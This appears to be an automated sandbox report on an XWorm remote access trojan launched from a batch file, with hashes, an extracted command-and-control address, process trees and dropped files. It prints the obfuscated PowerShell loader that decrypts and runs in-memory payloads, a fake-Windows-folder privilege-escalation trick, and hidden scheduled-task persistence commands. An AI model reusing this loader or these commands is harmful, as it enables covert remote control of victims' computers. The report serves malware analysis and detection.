xworm | 5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde

Analysis

max time kernel
4s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
08-06-2024 22:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RoWare.bat
Size

399KB
MD5

472de93de365167459958b7ce29f610e
SHA1

7a7ace619fbd8569c2982fb1fc44aa4b6040f351
SHA256

5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde
SHA512

03fc1017200c386cbe36050f5014c644edd57864ba1f7b88e5ab497d616ba3ec658ee8d690efde5544fe3befe569f3365e4d64f3b276245967193527e3b17f6a
SSDEEP

6144:VvP2P1+j6+5esGiWZo9wvkjXD6P8NUd7XPDRwEMiF7i5qwJgK5EG/R7H4z:ZOtyEvi7dzNmdjl5F7g1ZK8VH2

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

91.92.250.4:2709

Attributes

install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1092-80-0x0000014121BD0000-0x0000014121BE4000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4964 powershell.exe
4732 powershell.exe
940 powershell.exe
4840 powershell.exe
1092 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

ComputerDefaults.exe

pid process

2384 ComputerDefaults.exe
Loads dropped DLL 1 IoCs

Processes:

ComputerDefaults.exe

pid process

2384 ComputerDefaults.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2012 timeout.exe

pid	process
4964	powershell.exe
4732	powershell.exe
940	powershell.exe
4840	powershell.exe
1092	powershell.exe

pid	process
2384	ComputerDefaults.exe

pid	process
2384	ComputerDefaults.exe

pid	process
2012	timeout.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4840	powershell.exe
4840	powershell.exe
1092	powershell.exe
1092	powershell.exe
4964	powershell.exe
4956	powershell.exe
4964	powershell.exe
4956	powershell.exe
4732	powershell.exe
4732	powershell.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4840	powershell.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	4956	powershell.exe
Token: SeIncreaseQuotaPrivilege	4956	powershell.exe
Token: SeSecurityPrivilege	4956	powershell.exe
Token: SeTakeOwnershipPrivilege	4956	powershell.exe
Token: SeLoadDriverPrivilege	4956	powershell.exe
Token: SeSystemProfilePrivilege	4956	powershell.exe
Token: SeSystemtimePrivilege	4956	powershell.exe
Token: SeProfSingleProcessPrivilege	4956	powershell.exe
Token: SeIncBasePriorityPrivilege	4956	powershell.exe
Token: SeCreatePagefilePrivilege	4956	powershell.exe
Token: SeBackupPrivilege	4956	powershell.exe
Token: SeRestorePrivilege	4956	powershell.exe
Token: SeShutdownPrivilege	4956	powershell.exe
Token: SeDebugPrivilege	4956	powershell.exe
Token: SeSystemEnvironmentPrivilege	4956	powershell.exe
Token: SeRemoteShutdownPrivilege	4956	powershell.exe
Token: SeUndockPrivilege	4956	powershell.exe
Token: SeManageVolumePrivilege	4956	powershell.exe
Token: 33	4956	powershell.exe
Token: 34	4956	powershell.exe
Token: 35	4956	powershell.exe
Token: 36	4956	powershell.exe
Token: SeDebugPrivilege	4732	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

cmd.exepowershell.execmd.exeComputerDefaults.execmd.exepowershell.exe

description	pid	process	target process
PID 4664 wrote to memory of 2860	4664	cmd.exe	cmd.exe
PID 4664 wrote to memory of 2860	4664	cmd.exe	cmd.exe
PID 4664 wrote to memory of 2260	4664	cmd.exe	cmd.exe
PID 4664 wrote to memory of 2260	4664	cmd.exe	cmd.exe
PID 4664 wrote to memory of 4840	4664	cmd.exe	powershell.exe
PID 4664 wrote to memory of 4840	4664	cmd.exe	powershell.exe
PID 4840 wrote to memory of 4728	4840	powershell.exe	cmd.exe
PID 4840 wrote to memory of 4728	4840	powershell.exe	cmd.exe
PID 4728 wrote to memory of 2384	4728	cmd.exe	ComputerDefaults.exe
PID 4728 wrote to memory of 2384	4728	cmd.exe	ComputerDefaults.exe
PID 2384 wrote to memory of 2848	2384	ComputerDefaults.exe	cmd.exe
PID 2384 wrote to memory of 2848	2384	ComputerDefaults.exe	cmd.exe
PID 2848 wrote to memory of 3064	2848	cmd.exe	cmd.exe
PID 2848 wrote to memory of 3064	2848	cmd.exe	cmd.exe
PID 2848 wrote to memory of 3128	2848	cmd.exe	cmd.exe
PID 2848 wrote to memory of 3128	2848	cmd.exe	cmd.exe
PID 2848 wrote to memory of 1092	2848	cmd.exe	powershell.exe
PID 2848 wrote to memory of 1092	2848	cmd.exe	powershell.exe
PID 1092 wrote to memory of 4964	1092	powershell.exe	powershell.exe
PID 1092 wrote to memory of 4964	1092	powershell.exe	powershell.exe
PID 1092 wrote to memory of 4956	1092	powershell.exe	powershell.exe
PID 1092 wrote to memory of 4956	1092	powershell.exe	powershell.exe
PID 1092 wrote to memory of 4732	1092	powershell.exe	powershell.exe
PID 1092 wrote to memory of 4732	1092	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RoWare.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4664

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:2860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2SAi3wOvnkUFLRYxrM1Aug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bjuhq=New-Object System.IO.MemoryStream(,$param_var); $lHqpc=New-Object System.IO.MemoryStream; $ZhWoP=New-Object System.IO.Compression.GZipStream($bjuhq, [IO.Compression.CompressionMode]::Decompress); $ZhWoP.CopyTo($lHqpc); $ZhWoP.Dispose(); $bjuhq.Dispose(); $lHqpc.Dispose(); $lHqpc.ToArray();}function execute_function($param_var,$param2_var){ $DjkcC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tpQof=$DjkcC.EntryPoint; $tpQof.Invoke($null, $param2_var);}$adpqO = 'C:\Users\Admin\AppData\Local\Temp\RoWare.bat';$host.UI.RawUI.WindowTitle = $adpqO;$cSfZG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($adpqO).Split([Environment]::NewLine);foreach ($zHjor in $cSfZG) { if ($zHjor.StartsWith('dxmcSvpkIMoaFKFAdSEr')) { $kULPw=$zHjor.Substring(20); break; }}$payloads_var=[string[]]$kULPw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
2⤵
PID:2260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4728

C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2384

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c call SC.cmd
5⤵
- Suspicious use of WriteProcessMemory
PID:2848

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
6⤵
PID:3064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2SAi3wOvnkUFLRYxrM1Aug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bjuhq=New-Object System.IO.MemoryStream(,$param_var); $lHqpc=New-Object System.IO.MemoryStream; $ZhWoP=New-Object System.IO.Compression.GZipStream($bjuhq, [IO.Compression.CompressionMode]::Decompress); $ZhWoP.CopyTo($lHqpc); $ZhWoP.Dispose(); $bjuhq.Dispose(); $lHqpc.Dispose(); $lHqpc.ToArray();}function execute_function($param_var,$param2_var){ $DjkcC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tpQof=$DjkcC.EntryPoint; $tpQof.Invoke($null, $param2_var);}$adpqO = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $adpqO;$cSfZG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($adpqO).Split([Environment]::NewLine);foreach ($zHjor in $cSfZG) { if ($zHjor.StartsWith('dxmcSvpkIMoaFKFAdSEr')) { $kULPw=$zHjor.Substring(20); break; }}$payloads_var=[string[]]$kULPw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
6⤵
PID:3128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEABE.tmp.bat""
7⤵
PID:2232

C:\Windows\system32\timeout.exe
timeout 3
8⤵
- Delays execution with timeout.exe
PID:2012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
3⤵
PID:1892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\RoWare')
3⤵
PID:5076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
PID:940

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
88dc70c361a22feac57b031dd9c1f02f

SHA1
a9b4732260c2a323750022a73480f229ce25d46d

SHA256
43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

SHA512
19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
62KB

MD5
e566632d8956997225be604d026c9b39

SHA1
94a9aade75fffc63ed71404b630eca41d3ce130e

SHA256
b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

SHA512
f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
1KB

MD5
d812639c743524dab0f770d275d4d3cd

SHA1
a6678646afab7d45b6b2a5f437b84c7976533b96

SHA256
f106b3a1e2c9c4bbb66842b645cd4b638ca4ee8c73d96b46245a720bc9aca72d

SHA512
70ae961f3c2a0e10cb6e8b048c31e2871cc2309056f44cacbf00aab4a7021868210ce316630604008a89409b33f002807119be24428a625dca3a85a31af71aaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4a24cd2f7eea1929ac05a4dc990d3e67

SHA1
a5a1ee3e677d7c5991437c8345eaa933ac57294f

SHA256
8ab16f36aefdeee67c57653d0ce6ecc5bc7d114597d20de7361ca8a78c222ee6

SHA512
a283d3efc7ee602c01751eb46ef258993f3e19eef515aa9cc1c749b1217ea4eb10187573ffab3926e11711b428873222a556125702e2d6e5c3693e588b7a39cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4dcb591f64c5a200feded5b3963da678

SHA1
77c4941ac998d3cc3e55f74b0a152b7138e2fb67

SHA256
1fbd242d477324cd00b4eca95abe8d353ce7fb4898e7fcbd8b579c48dfb598b7

SHA512
08d81df9bbfea221341f7d79dab541957b618a2690657b3448b5ffb9f4e5b4b2eb4ea00188e6a071aa41e09e38c2242299c8f0027261a39cece900fc09a4dce3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
52805a54fc501a9f52f785d9cc7cce8a

SHA1
de4e1c104761cb0c2f89ed726d8373906a0bf844

SHA256
8b877cb7cdc0e43808518e437605baa2e905cb707a047eb66bed83848f3292d6

SHA512
fd7f479ce372c524d3b95527849016b257e93c97990afad219776f5fe537bc02f15bd0444fc5f53b3f6c9e4b7818db61df26ad903c93138369a184974d2ea319

Download Submit
C:\Users\Admin\AppData\Local\Temp\SC.cmd
Filesize
399KB

MD5
472de93de365167459958b7ce29f610e

SHA1
7a7ace619fbd8569c2982fb1fc44aa4b6040f351

SHA256
5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde

SHA512
03fc1017200c386cbe36050f5014c644edd57864ba1f7b88e5ab497d616ba3ec658ee8d690efde5544fe3befe569f3365e4d64f3b276245967193527e3b17f6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z1mnbunv.mjt.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpEABE.tmp.bat
Filesize
171B

MD5
0b887b03c448d057f3effcfe1754a354

SHA1
e122caa2337d0781ce80a19b9153ea9ac9012a48

SHA256
a80cc5b03fc8d1c40c2b01c99536afa879c6b6bdbfe002b2f8911ef12b81e829

SHA512
fa242d502b9e74574589dc5bb5806e8c6410f44c4d920ebfd74630692aafd04d84bbc549b672fd8e25cddf8235e11849b50045e934234c15a7623251daec97f8

Download Submit
C:\Windows \System32\ComputerDefaults.exe
Filesize
68KB

MD5
640693107ee411d8e862ab115d7b4639

SHA1
497435f5727c5bfe31331ba245e9b7b95dc69d2a

SHA256
a2794be7cb7a4ad2f526fe91ca95a36b2ec1648b288088eaa4809402c7b2c6f4

SHA512
3a554fe1d8d23f06ac86bb078b3e5b4815722adbacbf9492b5b7ad27bf27d44dd948387268dedc2943afc3557ef234e8882475c813cc5f5f4ab566e52bbb03db

Download Submit
C:\Windows \System32\MLANG.dll
Filesize
122KB

MD5
e286ada1af4b08fa4b7c78f862883c4e

SHA1
798ebc7b7cd3db667f1a59ade299be4cff397f39

SHA256
16eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3

SHA512
fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5

Download Submit
memory/488-132-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/540-120-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1092-80-0x0000014121BD0000-0x0000014121BE4000-memory.dmp

Filesize
80KB

Download
memory/1092-40-0x00007FFE79CB0000-0x00007FFE79D6D000-memory.dmp

Filesize
756KB

Download
memory/1092-39-0x00007FFE7AEE0000-0x00007FFE7B0E9000-memory.dmp

Filesize
2.0MB

Download
memory/1112-123-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1120-121-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1128-98-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1260-133-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1284-122-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1348-101-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1376-89-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1568-99-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1680-130-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1720-116-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1756-91-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1912-118-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1940-92-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/1948-93-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/2152-90-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/2248-131-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/2360-94-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/2460-119-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/2656-129-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/3264-88-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/3264-76-0x00000000008C0000-0x00000000008EA000-memory.dmp

Filesize
168KB

Download
memory/3492-117-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/3504-115-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/4048-114-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/4412-95-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/4456-113-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download
memory/4840-15-0x00007FFE7AEE0000-0x00007FFE7B0E9000-memory.dmp

Filesize
2.0MB

Download
memory/4840-11-0x0000020057BE0000-0x0000020057C26000-memory.dmp

Filesize
280KB

Download
memory/4840-0-0x00007FFE59E73000-0x00007FFE59E75000-memory.dmp

Filesize
8KB

Download
memory/4840-17-0x0000020057C30000-0x0000020057C7C000-memory.dmp

Filesize
304KB

Download
memory/4840-25-0x00007FFE59E70000-0x00007FFE5A932000-memory.dmp

Filesize
10.8MB

Download
memory/4840-24-0x00007FFE59E70000-0x00007FFE5A932000-memory.dmp

Filesize
10.8MB

Download
memory/4840-14-0x0000020057AE0000-0x0000020057AF0000-memory.dmp

Filesize
64KB

Download
memory/4840-3-0x0000020057B00000-0x0000020057B22000-memory.dmp

Filesize
136KB

Download
memory/4840-13-0x00007FFE59E70000-0x00007FFE5A932000-memory.dmp

Filesize
10.8MB

Download
memory/4840-12-0x00007FFE59E70000-0x00007FFE5A932000-memory.dmp

Filesize
10.8MB

Download
memory/4840-16-0x00007FFE79CB0000-0x00007FFE79D6D000-memory.dmp

Filesize
756KB

Download
memory/4840-247-0x00007FFE59E70000-0x00007FFE5A932000-memory.dmp

Filesize
10.8MB

Download
memory/4840-10-0x00007FFE59E70000-0x00007FFE5A932000-memory.dmp

Filesize
10.8MB

Download
memory/4916-96-0x00007FFE3AF70000-0x00007FFE3AF80000-memory.dmp

Filesize
64KB

Download